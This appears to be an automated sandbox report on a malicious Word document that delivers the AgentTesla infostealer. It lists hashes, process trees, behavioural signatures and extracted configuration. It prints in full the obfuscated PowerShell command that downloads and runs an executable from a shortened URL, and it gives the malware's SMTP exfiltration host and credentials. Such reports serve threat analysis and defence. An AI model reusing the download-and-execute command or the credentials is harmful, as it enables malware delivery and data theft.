Analysis

max time kernel: 139s
max time network: 139s
platform: windows10_x64
resource: win10v20201028
submitted: 11-03-2021 04:44

Static task: static1
Behavioral task: behavioral1
  Sample: IMG_1035_80_63.doc
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: IMG_1035_80_63.doc
  Resource: win10v20201028

General

Target: IMG_1035_80_63.doc
Size: 33KB
MD5: f1c7f28c1e71d97feabc188c267fd4a8
SHA1: bc323d3cb3234f98cfca8540ae9e7eb1ac29ab06
SHA256: b25e473d3fd1772bb3fcc4faec21fbdb5c1a5a2b2e3dcad5702d7466c8d7b9ce
SHA512: 5ecc4583ad9904c808b52efdf9821c8e2b38df9e84af199b7265c3c95e5417b42030ebccbcd92de8774c46d466d97902a336c0da5de4aad5870034670fb49c52
Malware Config

Extracted
  https://bit.ly/3ccVgSJ

Extracted
  Family: agenttesla
  Protocol: smtp
  Host: sixjan.club
  Port: 587
  Username: [email protected]
  Password: {DsG_Z,9Yl50
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  pid   pid_target  process         target process  description
  3564  580         powershell.exe  WINWORD.EXE     Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
AgentTesla Payload (2 IoCs)
Processes:
  resource                                                                      yara_rule
  behavioral2/memory/4028-26-0x0000000000400000-0x000000000043C000-memory.dmp  family_agenttesla
  behavioral2/memory/4028-27-0x000000000043762E-mapping.dmp                    family_agenttesla

Beds Protector Packer (1 IoC)
Detects Beds Protector packer used to load .NET malware.
Processes:
  resource                                                                     yara_rule
  behavioral2/memory/764-21-0x0000000005470000-0x00000000054EC000-memory.dmp  beds_protector

Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   process
  23    3564  powershell.exe
  25    3564  powershell.exe

Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  764   pauele.exe
  4028  pauele.exe
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Suspicious use of SetThreadContext (1 IoC)
Processes:
  description                         pid  process     target process
  PID 764 set thread context of 4028  764  pauele.exe  pauele.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                                  process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                     WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description        ioc                                                     process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS      WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid  process      count
  580  WINWORD.EXE  2

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid   process         count
  3564  powershell.exe  3
  4028  pauele.exe      2

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes:
  pid  process
  580  WINWORD.EXE

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  3564  powershell.exe
  Token: SeDebugPrivilege  4028  pauele.exe

Suspicious use of SetWindowsHookEx (17 IoCs)
Processes:
  pid  process      count
  580  WINWORD.EXE  17

Suspicious use of WriteProcessMemory (13 IoCs)
Processes:
  description                      pid   process         target process  count
  PID 580 wrote to memory of 3564  580   WINWORD.EXE     powershell.exe  2
  PID 3564 wrote to memory of 764  3564  powershell.exe  pauele.exe      3
  PID 764 wrote to memory of 4028  764   pauele.exe      pauele.exe      8
Processes

1. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
   "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_1035_80_63.doc" /o ""
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" INvOkE-EXpRessiOn((('t9Qclien'+'t '+'= new'+'-'+'object S'+'ys'+'tem.Net.'+'WebClient'+';t9Qa'+' = AEi'+'https://bit.ly/3ccVgSJ'+'AEi.Spl'+'i'+'t'+'('+'AEi'+','+'AEi);t9Qhu'+'as = '+'t'+'9Q'+'env:temp'+' + AEi'+'c4g'+'pauele.exe'+'AEi;for'+'each'+'(t9'+'Q'+'b'+' in t9Qa)'+'{try{t9Qclie'+'nt'+'.DownloadFil'+'e(t9Qb.ToS'+'t'+'ring()'+','+' '+'t9Qhuas);I'+'nvoke-Item(t9Qhua'+'s);'+'b'+'reak;}catch{'+'write-hos'+'t t'+'9Q'+'_.Exce'+'ption.Me'+'ssa'+'ge'+'}};') -rePlacE't9Q',[ChAr]36 -crEPLacE'c4g',[ChAr]92 -crEPLacE'AEi',[ChAr]39) )
      - Process spawned unexpected child process
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\AppData\Local\Temp\pauele.exe
         "C:\Users\Admin\AppData\Local\Temp\pauele.exe"
         - Executes dropped EXE
         - Suspicious use of SetThreadContext
         - Suspicious use of WriteProcessMemory

         4. C:\Users\Admin\AppData\Local\Temp\pauele.exe
            "C:\Users\Admin\AppData\Local\Temp\pauele.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\pauele.exe
MD5: 7442ea0814ae37240953a004cc6f74de
SHA1: a055479cdb44b950f18980447993844f13a6ddf4
SHA256: f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a
SHA512: e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67
resource                                                      filesize
memory/580-2-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp   64KB
memory/580-6-0x00007FFD5D8F0000-0x00007FFD5DF27000-memory.dmp   6.2MB
memory/580-7-0x00007FFD34E20000-0x00007FFD34E30000-memory.dmp   64KB
memory/580-3-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp   64KB
memory/580-5-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp   64KB
memory/580-4-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp   64KB
memory/764-24-0x0000000005760000-0x0000000005761000-memory.dmp  4KB
memory/764-25-0x00000000055B0000-0x00000000055BF000-memory.dmp  60KB
memory/764-23-0x0000000005620000-0x0000000005621000-memory.dmp  4KB
memory/764-22-0x0000000005A20000-0x0000000005A21000-memory.dmp  4KB
memory/764-15-0x0000000000000000-mapping.dmp
memory/764-21-0x0000000005470000-0x00000000054EC000-memory.dmp  496KB
memory/764-33-0x00000000054F0000-0x00000000054F1000-memory.dmp  4KB
memory/764-18-0x0000000073F30000-0x000000007461E000-memory.dmp  6.9MB
memory/764-19-0x0000000000C50000-0x0000000000C51000-memory.dmp  4KB
memory/3564-10-0x000001F221B30000-0x000001F221B31000-memory.dmp 4KB
memory/3564-9-0x00007FFD50480000-0x00007FFD50E6C000-memory.dmp  9.9MB
memory/3564-13-0x000001F221B63000-0x000001F221B65000-memory.dmp 8KB
memory/3564-12-0x000001F221B60000-0x000001F221B62000-memory.dmp 8KB
memory/3564-11-0x000001F221DF0000-0x000001F221DF1000-memory.dmp 4KB
memory/3564-8-0x0000000000000000-mapping.dmp
memory/3564-14-0x000001F221B66000-0x000001F221B68000-memory.dmp 8KB
memory/4028-27-0x000000000043762E-mapping.dmp
memory/4028-29-0x0000000073F30000-0x000000007461E000-memory.dmp 6.9MB
memory/4028-26-0x0000000000400000-0x000000000043C000-memory.dmp 240KB
memory/4028-35-0x00000000050C0000-0x00000000050C1000-memory.dmp 4KB
memory/4028-36-0x0000000005450000-0x0000000005451000-memory.dmp 4KB
memory/4028-37-0x0000000005C00000-0x0000000005C01000-memory.dmp 4KB
memory/4028-39-0x0000000002920000-0x0000000002921000-memory.dmp 4KB